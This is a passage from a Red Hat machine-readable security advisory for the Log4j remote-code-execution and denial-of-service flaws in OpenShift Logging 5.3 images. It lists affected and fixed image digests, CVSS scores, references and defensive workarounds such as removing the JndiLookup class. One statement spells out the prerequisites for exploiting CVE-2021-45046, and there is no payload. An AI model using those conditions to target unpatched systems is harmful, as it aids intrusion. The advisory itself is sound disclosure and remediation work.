Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x", 
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le" ], "known_not_affected": [ "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x", 
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x" ] }, 
"references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "RHBZ#2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "category": "external", "summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-10T02:01:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T19:37:00+00:00", "details": "For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nFor Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html", "product_ids": [ 
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5129" }, { "category": "workaround", "details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441", "product_ids": [ "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x", 
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64", 
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": 
"CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x", 
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x", 
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x" ] } ], "threats": [ { "category": "exploit_status", "date": "2021-12-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Moderate" } ], "title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value" }, { "cve": "CVE-2021-45046", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-12-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64", 
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le", 
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2032580" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. 
A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)", "title": "Vulnerability summary" }, { "category": "other", "text": "Although we have matched Apache\u0027s CVSS score, with the exception of the scope metric which will remain unaltered at \"unchanged\"; as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n \nWe have given this vulnerability an impact rating of Moderate, this is because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability. \nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects the log4j version between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability. \n\nPrerequisites to exploit this flaw are :\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup eg. ($${ctx:loginId}) \n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. to set the system property `log4j2.noFormatMsgLookup` to `true`) does NOT mitigate this specific vulnerability. 
\nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le" ], "known_not_affected": [ "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x", 
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64", 